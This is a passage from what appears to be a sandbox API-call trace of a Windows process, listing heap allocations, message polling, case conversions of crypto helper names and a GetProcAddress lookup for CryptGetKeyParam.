0x43e2540 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0125.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0125.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0125.720] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0125.720] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0125.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0125.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16d36) returned 0x49aa010 [0125.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16d36) returned 0x49d7a90 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0125.724] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0125.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0125.724] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0125.724] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0125.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0125.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0125.725] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0125.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.726] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0125.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0125.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0125.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0125.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0125.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0125.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0125.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0125.727] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0125.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0125.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0125.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0125.728] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0125.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0125.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0125.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0125.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0125.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0125.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0125.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0125.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0125.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0125.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0125.732] GetProcAddress 